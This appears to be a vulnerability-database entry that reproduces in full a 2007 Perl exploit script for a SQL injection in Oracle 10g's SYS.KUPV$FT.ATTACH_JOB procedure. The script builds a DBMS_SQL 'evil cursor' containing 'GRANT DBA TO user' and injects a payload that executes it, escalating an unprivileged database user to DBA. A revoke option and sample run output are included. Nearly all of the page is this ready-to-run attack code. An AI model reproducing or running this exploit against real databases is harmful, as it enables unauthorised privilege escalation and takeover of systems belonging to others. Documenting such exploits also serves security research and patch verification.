Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle 10g KUPV$FT.ATTACH_JOB SQL Injection Exploit v2

🗓️ 28 Feb 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 20 Views

Remote Oracle KUPV$FT.ATTACH_JOB 10g SQL Injection Exploit v2. This exploit allows granting or revoking DBA permission to unprivileged user. Requires Oracle InstantClient (basic + sdk) for DBD::Oracle.

Code

                                                #!/usr/bin/perl
#
# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
#  - Version 2 - New "evil cursor injection" tip!
#  - No "create procedure" privileg needed!
#  - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
# 
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# 
#   REF:    http://www.securityfocus.com/bid/16294
#   
#   AUTHOR: Andrea "bunker" Purificato
#           http://rawlab.mindcreations.com
#
#   DATE:   Copyright 2007 - Thu Feb 26 17:18:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68.
#  [-] Done!
# 
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g
#  [-] Wait...
#  [-] Creating evil cursor...
#  Cursor: 2
#  [-] Go ...(don't worry about errors)!
#  DBD::Oracle::st execute failed: ORA-31626: job does not exist
#  ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
#  ORA-06512: at "SYS.KUPV$FT", line 330
#  ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user
#  ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible
#  ORA-00942: table or view does not exist
#  ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
#  DECLARE
#   J BOOLEAN; R NUMBER;
#  BEGIN
#   R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J);
#  END;
#  "] at kupv-ft_attach_jobV2.pl line 100.
#  [-] YOU GOT THE POWAH!!
# 
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
#  [-] Wait...
#  [-] Revoking DBA from BUNKER...
#  [-] Done!
#

use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
    print <<"USAGE";
    
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:
     -h     <host>     target server address
     -s     <sid>      target sid name
     -u     <user>     user
     -p     <passwd>   password 

     -g|-r             (g)rant dba to user | (r)evoke dba from user
    [-P     <port>     Oracle port]

USAGE
    exit 0
}

my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};

my $dbh = undef;
if ($opt{P}) {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );


if ($opt{r}) {
    print "[-] Revoking DBA from $user...\n";
    $sqlcmd = "REVOKE DBA FROM $user";
    $dbh->do( $sqlcmd );
    print "[-] Done!\n";
    $dbh->disconnect;
    exit;
}

print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
  MYC := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
  DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { 
    print "$line\n";
    if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;

print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
 J BOOLEAN; R NUMBER;
BEGIN
 R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J);
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1
oraclekupv$ft.attach_jobsql injectionexploitgrantrevokedba permissionunprivileged userinstantclientdbd::oracle
20